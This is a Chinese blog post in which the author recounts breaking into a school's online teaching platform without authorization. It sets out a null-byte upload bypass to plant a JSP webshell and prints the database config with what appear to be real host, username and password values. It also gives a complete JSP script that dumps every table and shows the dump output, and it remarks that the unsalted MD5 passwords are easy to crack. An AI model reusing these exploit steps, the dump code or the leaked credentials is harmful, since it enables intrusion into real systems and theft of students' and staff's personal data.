渗透某网教平台从脱库到跑路


之前帮别人交网教平台的作业,然后发现了这个网教平台,我才不会告诉你叫青果软件网络教学平台,一开始好像只能校内网打开...

反正我当时是远控弄的,后来胆大的网管开了外网,又碰巧被我发现了,还就是这么巧我那天特别闲就去玩了一下(虽然我天天都很闲
一开始只是抱着找几个xss的心态,结果找着找着发现漏洞还是挺多的...

2017040600.jpg
用学生帐号登录进去后这里有个提出问题的功能,随手一试就发现存在储存型xss,重点不是这个!另外还发现竟然可以上传附件,但是格式限制为txt,pdf,gif,jpg,rar,doc,bmp,xls,ppt,mp3

2017040601.jpg
我这么机智当然能想到我要是可以上传个webshell那心里岂不是美滋滋的!
然后小手一抖随便拿了个文件抓了个上传的包
2017040602.jpg
没什么有价值的东西只有个文件大小,然后右键看了下源码没发现本地判断文件类型的js,于是对着电脑开始发呆,大概度过了两三个小时的贤者时间一下子找到了绕过上传格式限制的办法(明明试了大半天)
需要用到burpsuite/Fiddler
因为burpsuite需要java环境才能运行有精神洁癖的我...一直不愿意装所以直接用的Fiddler
大概原理就是先get到一个jsp的shell,然后把shell命名为yuyu.jsp.jpg

2017040603.jpg
然后用FD拦截上传文件的封包,转到十六进制模式查看,把文件名.jpg中j前面的.十六进制里是2E改成00这样系统读取的时候就在00的地方截断了实际保存到系统到系统的文件就是yuyu.jsp了
接着访问http://XXXXX/KingoWJ/uploadfile/yuyu.jsp

2017040604.jpg
成功拿下!
然后开始找数据库的配置文件

E:\KINGOSOFT\KingoWJ\jboss\server\default\.\deploy\KingoWJ.war\WEB-INF\classes\KingoDataSource.xml

配置文件的内容如下

<beans>
    <bean id="dataSource" class="com.mchange.v2.c3p0.ComboPooledDataSource" destroy-method="close">
        <property name="driverClass" value="oracle.jdbc.driver.OracleDriver"></property>
        <property name="jdbcUrl" value="jdbc:oracle:thin:@222.193.112.70:1521:orcl"></property>
        <!--
        <property name="user" value="KINGOWJ_NJSJ"></property>
        -->
        <property name="user" value="WLJXPT"></property>
        <property name="password" value="Ytcwangjiao2017"></property>
        <property name="minPoolSize"><value>5</value></property>
            <property name="maxPoolSize"><value>10</value></property>
    </bean>
</beans>

发现用的是oracle数据库...真少见..反正get到了数据库地址222.193.112.70:1521用户名WLJXPT密码Ytcwangjiao2017
于是手动下了个Navicat for Oracle想连一下把数据库脱下来,结果并没有成功发现根本连不上去...也没提示密码错误,而是超时,telnet了一下222.193.112.70:1521发现根本连不上,估计是数据库只能内网上吧,就找了该学校的学生用学校里宿舍的网想连一下能不能连上...结果也失败了,今天才发现(对!没错!前面的事情我几天前就做到了!)可以直接用shell把数据库下载到服务器本地,于是就传了个脱库的shell上去(我为什么前几天没想到,大概是我太善良吧)

//shell源码
<%@ page import="java.sql.*" %>
<%@ page import="java.util.*" %>
<%@ page import="java.io.*" %>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%
try {
    String backupDir = "F:/ ";
    String ex="1.txt";
 
    String driver = "oracle.jdbc.driver.OracleDriver";
    String url = "jdbc:oracle:thin:@222.193.112.70:1521:orcl";
    String username = "WLJXPT";
    String password = "Ytcwangjiao2017";
 
    Class.forName(driver);
    Connection conn = DriverManager.getConnection(url, username, password);
 
    // Get tables
    String sql_tables="select TABLE_NAME from user_tab_comments";
    PreparedStatement ps = conn.prepareStatement(sql_tables);
    ResultSet rs = ps.executeQuery();
    ArrayList<String> tables = new ArrayList<String>();
    while (rs.next()) {
        tables.add(rs.getString(1));
    }
    rs.close();
 
    for(int i=0;i<tables.size();i++){
        String table=tables.get(i);
        out.println("Dumping data for table " + table + "...<br />");
        OutputStreamWriter osw = new OutputStreamWriter(new FileOutputStream(backupDir+table+ex), "UTF-8");
        BufferedWriter bw=new BufferedWriter(osw);
        String sql="select * from "+table;
        PreparedStatement p = conn.prepareStatement(sql);
        ResultSet r = p.executeQuery();
        ResultSetMetaData rsmeta=r.getMetaData();
 
        while(r.next()){
             bw.append("INSERT INTO " + table + " VALUES(");
             // JDBC is 1-based, Java is not !?
             for (int col = 1; col <= rsmeta.getColumnCount(); col++) {
                 bw.append("'");
                 if (r.getString(col) == null)
                     bw.append("");
                 else
                     bw.append(r.getString(col));
                 if (col == rsmeta.getColumnCount())
                     bw.append("'");
                 else
                     bw.append("', ");
             }
             bw.append(");");
             bw.newLine();
        }
 
        bw.flush();
        bw.close();
        osw.close();
        r.close();
    }
 
    rs.close();
    out.println("backup is ok");
    conn.close();
} catch (Exception e) {
    response.setStatus(200);
    e.printStackTrace();
}
out.println("<p><h3>finished</h3></p>");
%>

执行后效果如下

Dumping data for table USERSKINS...
Dumping data for table T_ZZ_LESSONCONTENT...
Dumping data for table T_ZZ_CONTENTVISITEDINFO...
Dumping data for table T_ZZ_CONTENTTYPE...
Dumping data for table T_ZY_YJXK...
Dumping data for table T_ZY_XXCC...
Dumping data for table T_ZY_SUBMITWORKTEST...
Dumping data for table T_ZY_SOURCEVIDOLIST...
Dumping data for table T_ZY_SETWORKTEST...
Dumping data for table T_ZY_SETWORK...
Dumping data for table T_ZY_SCHOOL...
Dumping data for table T_ZY_RESOURCEVISITEDINFO...
Dumping data for table T_ZY_RESOURCETYPE...
Dumping data for table T_ZY_RESOURCECONTENT...
Dumping data for table T_ZY_EJXK...
Dumping data for table T_ZY_CORRECTWORKTEST...
Dumping data for table T_ZY_BESTCOURSES...
Dumping data for table T_XL_XS_WORKTESTSCORE...
Dumping data for table T_XL_XS_TESTSTRATEGY...
Dumping data for table T_XL_XS_TESTDTSTRATEGY...
Dumping data for table T_XL_XS_SUBMITWORKTEST...
Dumping data for table T_XL_XS_SETWORK_TYPE...
Dumping data for table T_XL_XS_SETWORKTEST...
Dumping data for table T_XL_XS_SETWORK...
Dumping data for table T_XL_SUBMITWORKTEST...
Dumping data for table T_XL_SETWORK_TYPE...
Dumping data for table T_XL_SETWORKTEST...
Dumping data for table T_XL_SETWORK...
Dumping data for table T_SJ_TESTTYPE...
Dumping data for table T_SJ_TESTSTRATEGY...
Dumping data for table T_SJ_TESTMOLD...
Dumping data for table T_SJ_TESTINFO...
Dumping data for table T_SJ_TESTDTSTRATEGY...
Dumping data for table T_SJ_TESTDIFFICULT...
Dumping data for table T_SJ_SORT_ANSWERCODE...
Dumping data for table T_SJ_SORT...
Dumping data for table T_SJ_SIMPLEANSWER...
Dumping data for table T_SJ_SELECTWORD_ANSWERCODE...
Dumping data for table T_SJ_SELECTWORD...
Dumping data for table T_SJ_READINGCOMPREHENSION...
Dumping data for table T_SJ_RC_SUBJECT_ANSWER...
Dumping data for table T_SJ_RC_SUBJECT...
Dumping data for table T_SJ_ONEVACANT_ANSWER...
Dumping data for table T_SJ_ONEVACANT...
Dumping data for table T_SJ_ONESELECT_ANSWER...
Dumping data for table T_SJ_ONESELECT160517...
Dumping data for table T_SJ_ONESELECT...
Dumping data for table T_SJ_NOUNEXPLAIN...
Dumping data for table T_SJ_MOREVACANT_ANSWER...
Dumping data for table T_SJ_MOREVACANT...
Dumping data for table T_SJ_MORESELECT_ANSWER...
Dumping data for table T_SJ_MORESELECT160517...
Dumping data for table T_SJ_MORESELECT...
Dumping data for table T_SJ_MATCH_QUESTIONCODE...
Dumping data for table T_SJ_MATCH_ANSWERTORIGHT...
Dumping data for table T_SJ_MATCH_ANSWERCODE...
Dumping data for table T_SJ_MATCH...
Dumping data for table T_SJ_LABEL...
Dumping data for table T_SJ_JUDGE...
Dumping data for table T_SJ_FILEANSWER...
Dumping data for table T_SJ_EXPOUND...
Dumping data for table T_SJ_DOTCODE...
Dumping data for table T_SJ_CREATETEST_TYPE...
Dumping data for table T_SJ_CREATETEST_QUEST...
Dumping data for table T_SJ_CREATETEST...
Dumping data for table T_SJ_COUNTNUMBER...
Dumping data for table T_SJ_ANSWERCODE...
Dumping data for table T_PT_ZD_ZTBZ...
Dumping data for table T_PT_ZD_XUEWEI...
Dumping data for table T_PT_ZD_XUEQI...
Dumping data for table T_PT_ZD_XUELI...
Dumping data for table T_PT_ZD_SEX...
Dumping data for table T_PT_ZD_SETPRACTEACH_SORT...
Dumping data for table T_PT_ZD_PROFESSIONINFO...
Dumping data for table T_PT_ZD_LSORT4INFO...
Dumping data for table T_PT_ZD_GANGWEI...
Dumping data for table T_PT_ZD_BUILDINGTYPE...
Dumping data for table T_PT_ZD_BESTCOURSETYPE...
Dumping data for table T_PT_USER_GROUPRIGHT...
Dumping data for table T_PT_USERRIGHT...
Dumping data for table T_PT_USERLIMIT...
Dumping data for table T_PT_USERINFO...
Dumping data for table T_PT_TASK...
Dumping data for table T_PT_STUDENTSTATUS...
Dumping data for table T_PT_STUDBASEINFO...
Dumping data for table T_PT_STATE...
Dumping data for table T_PT_STAFFROOMINFO...
Dumping data for table T_PT_SPECIALTY...
Dumping data for table T_PT_SJJK_APPLICATION...
Dumping data for table T_PT_SETLANMUINFO...
Dumping data for table T_PT_SETLANMU...
Dumping data for table T_PT_SERVERADDRESS...
Dumping data for table T_PT_SCHOOL_NOTICE...
Dumping data for table T_PT_SCHOOLCALENDAR...
Dumping data for table T_PT_SCHOOLAREA...
Dumping data for table T_PT_SCHOOL...
Dumping data for table T_PT_ROLEMENU...
Dumping data for table T_PT_REFUSEIP...
Dumping data for table T_PT_PICNEWS...
Dumping data for table T_PT_PERSONNUMINFO...
Dumping data for table T_PT_NOTIFY...
Dumping data for table T_PT_MENUINFO151014...
Dumping data for table T_PT_MENUINFO...
Dumping data for table T_PT_LOGINLOG...
Dumping data for table T_PT_LINKINFO...
Dumping data for table T_PT_LESSONSCHEDULE...
Dumping data for table T_PT_LESSONCLASS...
Dumping data for table T_PT_KINGOPROBATIONVALIDATE...
Dumping data for table T_PT_INSTITUTEINFO...
Dumping data for table T_PT_IMGXQ...
Dumping data for table T_PT_GROUPRIGHT...
Dumping data for table T_PT_EMPLOYEE...
Dumping data for table T_PT_ELECTIVECOURSE...
Dumping data for table T_PT_DOWNLOADINFO...
Dumping data for table T_PT_CURXNXQ...
Dumping data for table T_PT_COURSEDEPARTMENT...
Dumping data for table T_PT_COURSE...
Dumping data for table T_PT_CLASSROOMINFO...
Dumping data for table T_PT_CLASSINFO...
Dumping data for table T_PT_CITY...
Dumping data for table T_PT_BASEINFO...
Dumping data for table T_PT_APPLYDATE...
Dumping data for table T_PJ_TEACHQUALITY...
Dumping data for table T_PJ_STUYJB...
Dumping data for table T_PJ_STUDEVALRESULT...
Dumping data for table T_PJ_NONSTUDEVALSCOPE...
Dumping data for table T_PJ_NONSTUDEVALMEMBER...
Dumping data for table T_PJ_DEGREE_SETPARAM_PJZT...
Dumping data for table T_PJ_DEGREE_SETPARAM...
Dumping data for table T_PJ_COURSEEVALQUESTION...
Dumping data for table T_PJ_BODY_PERCENT...
Dumping data for table T_PJ_APPRAISE_BODY...
Dumping data for table T_PJ_APPRAISESTANDARD_ANSWER...
Dumping data for table T_PJ_APPRAISESTANDARD...
Dumping data for table T_PJ_APPRAISEITEM...
Dumping data for table T_KT_SETNETLESSON...
Dumping data for table T_KT_ENTERNETLESSON...
Dumping data for table T_KS_SUBMITWORKTEST160517...
Dumping data for table T_KS_SUBMITWORKTEST...
Dumping data for table T_KS_SETWORK_TYPE...
Dumping data for table T_KS_SETWORKTEST...
Dumping data for table T_KS_SETWORK...
Dumping data for table T_KS_SETEXAM...
Dumping data for table T_KS_EXAMWORKSTU...
Dumping data for table T_KS_EXAMWORK...
Dumping data for table T_KS_CORRECTWORKTEST...
Dumping data for table T_JL_SHORTMSGMAPPED...
Dumping data for table T_JL_SHORTMESSAGE...
Dumping data for table T_JL_READNOTE...
Dumping data for table T_JL_QUESTIONTYPE...
Dumping data for table T_JL_QUESTION...
Dumping data for table T_JL_MESSAGE...
Dumping data for table T_JL_FBNOTE...
Dumping data for table T_JL_CREATECHATROOM...
Dumping data for table T_JL_CJQUESTION...
Dumping data for table T_JL_CHATUSER...
Dumping data for table T_JL_ANSQUESTION...
Dumping data for table T_DATATABLE...
Dumping data for table T_DATACOLUMN...
Dumping data for table T_DATABOOK_DETAIL...
Dumping data for table T_DATABOOK...
Dumping data for table T_CJ_SUBMITSCORE_MX160517...
Dumping data for table T_CJ_SUBMITSCORE_MX...
Dumping data for table T_CJ_SUBMITSCORE...
Dumping data for table T_CJ_SCOREQZ...
Dumping data for table TW_SYSSET...
Dumping data for table TW_SYSMENUINFO...
Dumping data for table TW_BBS_TUNUSE...
Dumping data for table TW_BBS_TRECENT...
Dumping data for table TW_BBS_TMEMBER...
Dumping data for table TW_BBS_TINDEX...
Dumping data for table TW_BBS_TCONTENT...
Dumping data for table TW_BBS_TCONFIG...
Dumping data for table TW_BBS_MCONFIG...
Dumping data for table TUIA_MENUINFO...
Dumping data for table TEMP_SUBMITWORKTEST...
Dumping data for table PLAN_TABLE...
Dumping data for table JFORUM_WORDS...
Dumping data for table JFORUM_VOTE_VOTERS...
Dumping data for table JFORUM_VOTE_RESULTS...
Dumping data for table JFORUM_VOTE_DESC...
Dumping data for table JFORUM_USER_GROUPS...
Dumping data for table JFORUM_USERS...
Dumping data for table JFORUM_TOPICS_WATCH...
Dumping data for table JFORUM_TOPICS...
Dumping data for table JFORUM_THEMES...
Dumping data for table JFORUM_SMILIES...
Dumping data for table JFORUM_SESSIONS...
Dumping data for table JFORUM_ROLE_VALUES...
Dumping data for table JFORUM_ROLES...
Dumping data for table JFORUM_RANKS...
Dumping data for table JFORUM_QUOTA_LIMIT...
Dumping data for table JFORUM_PRIVMSGS_TEXT...
Dumping data for table JFORUM_PRIVMSGS...
Dumping data for table JFORUM_POSTS_TEXT...
Dumping data for table JFORUM_POSTS...
Dumping data for table JFORUM_MODERATION_LOG...
Dumping data for table JFORUM_KARMA...
Dumping data for table JFORUM_GROUPS...
Dumping data for table JFORUM_FORUMS_WATCH...
Dumping data for table JFORUM_FORUMS...
Dumping data for table JFORUM_EXTENSION_GROUPS...
Dumping data for table JFORUM_EXTENSIONS...
Dumping data for table JFORUM_CONFIG...
Dumping data for table JFORUM_CATEGORIES...
Dumping data for table JFORUM_BOOKMARKS...
Dumping data for table JFORUM_BANNER...
Dumping data for table JFORUM_BANLIST...
Dumping data for table JFORUM_ATTACH_QUOTA...
Dumping data for table JFORUM_ATTACH_DESC...
Dumping data for table JFORUM_ATTACH...
Dumping data for table DLOG_USER...
Dumping data for table DLOG_T_REPLY...
Dumping data for table DLOG_TYPE...
Dumping data for table DLOG_TRACKBACK...
Dumping data for table DLOG_TOPIC...
Dumping data for table DLOG_TAG...
Dumping data for table DLOG_SITE_STAT...
Dumping data for table DLOG_SITE...
Dumping data for table DLOG_P_REPLY...
Dumping data for table DLOG_PHOTO...
Dumping data for table DLOG_MY_BLACKLIST...
Dumping data for table DLOG_MUSICBOX...
Dumping data for table DLOG_MUSIC...
Dumping data for table DLOG_MESSAGE...
Dumping data for table DLOG_LINK...
Dumping data for table DLOG_J_REPLY...
Dumping data for table DLOG_GUESTBOOK...
Dumping data for table DLOG_FRIEND...
Dumping data for table DLOG_FORUM...
Dumping data for table DLOG_FCK_UPLOAD_FILE...
Dumping data for table DLOG_EXTERNAL_REFER...
Dumping data for table DLOG_DIARY...
Dumping data for table DLOG_CONFIG...
Dumping data for table DLOG_COMMENTS...
Dumping data for table DLOG_CATALOG_PERM...
Dumping data for table DLOG_CATALOG...
Dumping data for table DLOG_BULLETIN...
Dumping data for table DLOG_BOOKMARK...
Dumping data for table DLOG_BLOCKED_IP...
Dumping data for table DLOG_ALBUM...
Dumping data for table DATAUSER...
Dumping data for table CODESET...
Dumping data for table CODEOBJECT...
Dumping data for table ACCOUNT...
Dumping data for table WEB_BBS_TMEMBER...
Dumping data for table T_BBS_USERINFO...
backup is ok
finished

至此数据库已经全下载下来了,但是密码都MD5加密了,不过都没加盐所以还是很好查出来的
最后附上一个脱敏的数据表以供学习研究
T_BBS_USERINFO1.txt

添加新评论